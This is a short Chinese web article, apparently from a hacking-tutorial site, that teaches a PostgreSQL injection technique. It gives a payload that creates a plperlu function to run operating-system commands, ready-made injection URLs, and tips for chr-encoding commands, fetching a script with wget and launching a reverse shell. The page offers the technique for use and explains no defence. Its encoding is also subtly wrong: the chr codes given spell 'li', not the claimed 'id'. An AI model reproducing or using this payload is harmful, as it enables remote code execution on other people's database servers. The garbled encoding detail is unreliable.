• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    postgresql初级注入方法

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;

     

    select id();搜狗电脑知识网

    id()为创建函数名,可以自定义随便写

    chr(108).chr(105)是需要执行的命令id的asc编码

    自己把需要执行的命令换成chr替换就行了,具体就是wget -O /tmp/c.pl   

    删除函数为drop function id(); 然后再执行此反弹shell的命令

     

    此大法可对付一切8.0以上的版本(含8.0)

     

    以下为实际注入时的表现形式

    xxx.php?id=10;CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;--

    xxx.php?id=10 and 1=2 union select null,null,null,id(),null,null,null,null--​

     

  • 上一篇:动易xss拿站小记
  • 下一篇:关于web渗透中得一些记录
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1